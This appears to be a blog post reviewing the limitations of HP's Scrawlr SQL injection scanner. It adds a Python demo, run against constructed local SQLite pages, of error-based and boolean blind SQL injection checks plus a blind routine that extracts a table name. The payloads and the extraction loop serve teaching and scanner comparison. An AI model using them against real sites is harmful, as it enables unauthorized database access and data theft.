HP released a new tool called Scrawlr yesterday that can be used to identify certain types of SQL Injection vulnerabilities in a website. It was a joint effort with Microsoft and a direct response to the recent mass SQL Injection attacks. Scrawlr quickly came under fire on the Web Security mailing list for having some pretty major limitations. Billy Hoffman et al. have been quick to point out that the tool was designed to address a very specific subset of SQL Injection vulnerability (the type exploited by the mass attacks) and is not meant to be a general-purpose replacement for existing SQL Injection scanners. Let's look at the limitations, as outlined on the HP page, one by one.

Limitation: Will only crawl up to 1500 pages

It depends on what they mean by 1500 pages. For example, if I have these links on my front page, is that one URL or three?
Or does it mean that it will really only crawl 1500 pages total, so that if I have the same link 1500 times on the front page it won't go any further? Either way, for most smaller websites this is probably fine. If you need more than 1500, you could give it different starting URLs in an attempt to improve coverage. It would be nice to have a clearer definition of what it means to "crawl up to 1500 pages", though.

Limitation: Does not support sites requiring authentication

Well, this renders it useless for the majority of enterprise apps. But there are still a lot of sites out there that don't require authentication, including some of the ones that got hit during the mass attacks, such as the United Nations, the UK government, etc. [Update 06/26: Thomas Ptacek Mike Tracy investigates further and provides a workaround that will work for the majority of sites that use cookie-based auth.]

Limitation: Does not perform Blind SQL injection

They have taken a lot of flak for this, but Billy describes it as a conscious choice:
An early version of the tool checked for blind SQL injection, but the final version of Scrawlr did not. ... The biggest feedback we got from early testing was developers wanted to "see" the vulnerability. Differential analysis is kind of difficult to visualize in a way that is helpful for the average dev, and pulling the table names through blind was too much of a performance issue.
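To make the distinction between a "visible" check and blind differential analysis concrete, here is an added example (my own code, not Scrawlr's and not anything from HP). It stands up three constructed, in-memory "pages" backed by SQLite: one that echoes database errors, one that swallows them (a blind target), and one that uses a parameterized query. An error-based check of the kind Scrawlr performs only flags the first; a boolean-based differential check flags both vulnerable pages; and a blind extraction routine pulls the table name out one character at a time while counting requests, which is the performance cost Billy refers to. The page handlers, marker strings and charset are all assumptions made for the example.

```python
import sqlite3

# Constructed stand-in for a website: an in-memory SQLite database with one table.
# Nothing here is a real site or the Scrawlr tool itself.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
_conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])


def _render(rows):
    return "Product: " + rows[0][0] if rows else "No product found"


def verbose_page(id_param):
    """Vulnerable: SQL built by string interpolation, raw DB error echoed to the client."""
    try:
        rows = _conn.execute(f"SELECT name FROM products WHERE id = {id_param}").fetchall()
    except sqlite3.Error as e:
        return f"DB error: {e}"
    return _render(rows)


def quiet_page(id_param):
    """Vulnerable in exactly the same way, but errors are swallowed: a blind target."""
    try:
        rows = _conn.execute(f"SELECT name FROM products WHERE id = {id_param}").fetchall()
    except sqlite3.Error:
        return "Sorry, something went wrong."
    return _render(rows)


def safe_page(id_param):
    """Parameterized query; neither check should flag it."""
    try:
        pid = int(id_param)
    except ValueError:
        return "Invalid id"
    rows = _conn.execute("SELECT name FROM products WHERE id = ?", (pid,)).fetchall()
    return _render(rows)


# Assumed set of substrings that indicate a database error leaked into the page.
ERROR_MARKERS = ("DB error", "syntax error", "unrecognized token", "SQL")


def error_based_check(page, base="1"):
    """Visible check: inject a lone quote and look for a DB error in the response."""
    body = page(base + "'")
    return any(m.lower() in body.lower() for m in ERROR_MARKERS)


def blind_boolean_check(page, base="1"):
    """Differential analysis: a TRUE and a FALSE condition must produce different pages,
    and the TRUE page must match the untouched baseline. No error text is needed."""
    baseline = page(base)
    true_body = page(base + " AND 1=1")
    false_body = page(base + " AND 1=2")
    return baseline == true_body and true_body != false_body


def scan(page):
    return {"error_based": error_based_check(page), "blind_boolean": blind_boolean_check(page)}


def blind_extract(page, expr, base="1", charset="abcdefghijklmnopqrstuvwxyz", max_len=16):
    """Recover the string value of a SQL expression using only TRUE/FALSE page shapes.
    Each character costs up to len(charset) requests; returns (value, request_count)."""
    truthy = page(base)
    out, requests = "", 0
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            requests += 1
            if page(f"{base} AND substr(({expr}),{pos},1)='{ch}'") == truthy:
                found = ch
                break
        if found is None:  # no candidate matched: end of string
            break
        out += found
    return out, requests


if __name__ == "__main__":
    for name, page in (("verbose", verbose_page), ("quiet", quiet_page), ("safe", safe_page)):
        print(name, scan(page))
    # The table-name extraction Billy mentions, against the blind target.
    print(blind_extract(quiet_page, "SELECT name FROM sqlite_master WHERE type='table'"))
```

Running it shows the verbose page flagged by both checks, the quiet page flagged only by the differential check, and the safe page by neither. The extraction pulls back the single table name with well over a hundred requests for eight characters, using a naive linear search; real tools use binary search on character codes but are still bound by one request per bit.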